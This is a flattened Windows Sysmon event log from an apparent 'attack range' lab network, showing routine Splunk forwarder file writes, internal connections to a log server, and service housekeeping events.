10:37:24.685{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C8F41493439146BB74D0D2C7C68AEE8,SHA256=B696849E8597F907D2A407199CBF732B8F3ECE888B9EDB9CF67033E7F2949324,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:24.185{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF03CF55765A37C1B939FE07F426510B,SHA256=5FB110BD410DF11C0CF73915D467517EB61B7BF1E88FD56DDBCA88EFA24F1B94,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.521{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53235-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:25.700{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D7688C4D66D7F100CED77A7F092F1A,SHA256=9B063C8FAB78CC39DD2619FFDBE7EE861557C45272B331651B42CC0E0F414063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:25.404{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C99DCF3613CAC7D8DB2D7B6D61C3F5AA,SHA256=8B2B807D0543E14E12B294BF211C9CF09EA1BB8ACA53EF07C647704AE642C3CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:26.810{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EADEE0A0F0A6113D897E7D11C9EF759F,SHA256=3B81965A3D6BC0CEA659C9D96DD6A034E01850A82C36641C4C245672182628CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:26.404{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01DD265F0294A336771497A7E5C23555,SHA256=8A75036C9854C34FA1A0396818006B903E56695927594D8AABB2298DDB7D91E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:27.872{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F28EC04E67E800B251BB50D7289D12C8,SHA256=CFDF5541C9BA465EB5F445FD9000D569DB9CC71C1395BC883945DFAFD75F4BA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:27.419{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=864FD0A1372C608F8CE30D701D3E8152,SHA256=3FD4B1F5985425211B1A7B58601A3F99D97B2F197F97D4E41A2910E53D52F93A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:28.903{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEEE4690AFAF87505C0C723E06879E31,SHA256=BBE29CEC8ED0A78A8601EDFAC7AFBA271432DCF4B7FFF124B68F9DC59501393F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:28.451{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2FB5846141F9310A47A6F94450394D2,SHA256=7A6E5459BC7696F4A7BF4E9C0A0B068E782CB63F6AD10D2E871AD7B82BE44F9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:25.609{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51182-false10.0.1.12-8000- 23542300x8000000000000000285230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:29.919{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C8ED644F60DF1BBD812B8B7893B917,SHA256=84EC9E704C1ECD77782A0C736BE6FEEAB02B8FCE1E42197AA1CC49BAAB8B9D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:29.669{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10B0FB844FCAA761F586B622767BA2FB,SHA256=88887AA4369F9ADEF9072CDBF438A5BE077CC3F314F42852CDB75ABE11FC5A0E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:26.568{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53236-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:30.919{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17D372696FE9F89634E913637D0C8C0A,SHA256=D1EBE105ABA00B902441BB54AA2BB8CF75E76D57C679CD69EBA19DE3733DD08D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:30.685{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C12FD75D1EBB22CFB6F4EBCD5D8134A,SHA256=E24289899E8280FB7206554E190B4AAB6ABD7C7062F2882C2A370761D192B592,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:30.232{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CB713E6EBC62B592D57150B98A953585,SHA256=E71D8339ED26422429E3490CFEC7142A9997A22F6C44FB069854333F57C45095,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:31.935{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2061A706AA9F051DB032A9773756B412,SHA256=C42E8403665061B45CB8856EFD4EDA99DD11B7A7BD5A948AF3B58CD01A99A887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:31.685{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56DBC75C969E1D1123CB51EF3BD6DB1A,SHA256=424A87B893D5F55B182247E4D0B0F19D0EB54BB5E2543F43B080425C48F6DE72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:32.950{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F27EA812BA5F936FD35B6C299B266E1,SHA256=1CE6E2BECBADB32EEBACDFC44B0FFC17F9C9A18E5813045710548F988252441E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:32.685{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54742C616E860580EE619227F23405C7,SHA256=17584F34CC4D771BBA9989FA0FA01CB9DB14D578D319326EC3CB6AB3D312F923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:33.966{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C46AE3A9472172A97D6D827B6538A54,SHA256=4DF65888B38E1C5734412E9DA66403D1438CFFD8334802FE1CC576E209A0FE24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:33.749{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86F0FB0A30B5616A0AEC557B7CB840E1,SHA256=95B48C869DB400A50778C6FB18DB7A3BEED0DC3B841067942C74B072D2CA3CBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:33.247{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7A9FA08CAB22F17EB76A8F948C12C100,SHA256=DB2830998C30CDEF91971203FEB9405FFD4E8142FB1F64B0DBB85C195BEA11C5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:30.687{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51183-false10.0.1.12-8000- 23542300x8000000000000000285237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:34.966{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F181B27630BE066F1EAFFD2C401DADBA,SHA256=B6E4B6B1F98D5820608FFDD1093CBDCB8FD5C8A73948F4513826EC95FFA0C855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:34.765{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=510CA1FB30F11BC7B8C15F99DBBBB9E9,SHA256=12CA99D19056092C3816710AC61228882C36DCAA440DE5025B02B355B9D54D6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:31.646{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53237-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:35.981{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA6C8812D13DA024E7C115271DF11B04,SHA256=6DEB0DB3D53D497044137CE1C20CE3C7BD94214913F8D2C03F8DD8BDD9A9C5EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:35.999{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F0418676771B14390E7EDEBFB319FD,SHA256=AAB187282DA107E4969D0A30B9D56CAB736516C40F0B148E1300FCF73F8B9BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:37.200{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5D4C290774BD766459E2C6536CF59CA,SHA256=50B8CAC50BDB2552737B95EF231F73E36B074A05CEAB3C4C92B84BED603AABA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:37.218{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C1499224B006855913C7F2A3F602619,SHA256=D12947360BAC50B8D4423EA08ADCA2E7498F1D2045B98EAA8C1C7A9C1A71BAC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:38.403{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDE2558D8A95D0C31244245EF90731CC,SHA256=D8AB5C509A040CBFFDFAA03A0381F01FE5C19BEAE8FEBE2F0F1F4ECC6CE7B4A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:38.440{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-121MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:38.233{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A40F28AD8FA89C272BB08C48FD05B282,SHA256=E7F670C0B8B455C0E8DBF3004EF42447B0108BE7FC9FDB5CE13FFAE95BE06AC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:39.450{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:39.450{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE650899CE17147F975298564388E563,SHA256=F9805B0EB56334F1FB74B5026D6F56F56553B613D45E76200D7CFAE45B5DFB2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:36.641{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51184-false10.0.1.12-8000- 23542300x8000000000000000214332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:39.438{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-122MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:39.343{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBCFF661D7F8CDDDBC2D11F1E5311495,SHA256=37024439126F5F33F684454B896757E9BE4CAA29BBCF682AB87F550144E030A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:38.912{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53239-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000285244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:37.568{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53238-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:40.466{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABD0CC640B102358C2E90DB136A67443,SHA256=8BD2D88AE7CB30FF68403F7577509E078237E8FFAF565D0B423C08E5A3119528,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:40.453{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EAE1CC214F683852520FF9E50644B43,SHA256=1C77111C69BADDAFD1EDB006BC0119790EA3B52A84A7B8EA0A20CF9224921D7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:41.513{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3113B41FF9CCC75ED8E7F209CC99669,SHA256=7759CBCA7893D3B09501910175A12A8A948FCCDF986846D20464B6EDF84F5180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:41.500{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0E5D5ECCD4E0C9733053E8F198523D1,SHA256=F5A4DA0BB9B17442D5B31CC1160E2CE4C0EE87DBF38E86E780C9E3C107F24647,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:42.528{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA439AAB3B61F0197844B7773631CD46,SHA256=C10F2CB37493C892746060B903837ADB41BF0E3BEF1686CD03492407C9137C30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:42.515{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DF63449C70667859A9BE209A8072D14,SHA256=92D15309C9A186E3CA781BA3526AF064C006874B46EBF01A5BDC81443B0C8588,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:43.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4AB35C31DFAB037E2C5A0E8EE8D5324,SHA256=1CB29AE67E62C4117F92BFF29EACA1CC456D6685C473312ABB6A34E92FF157E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:43.515{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2335AD74205B9E47CC908E8800BD0AFA,SHA256=5D35A4F8E583BA5F98E189927ED3CB0B6DF877CE8176A48AA3FE648411668AAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 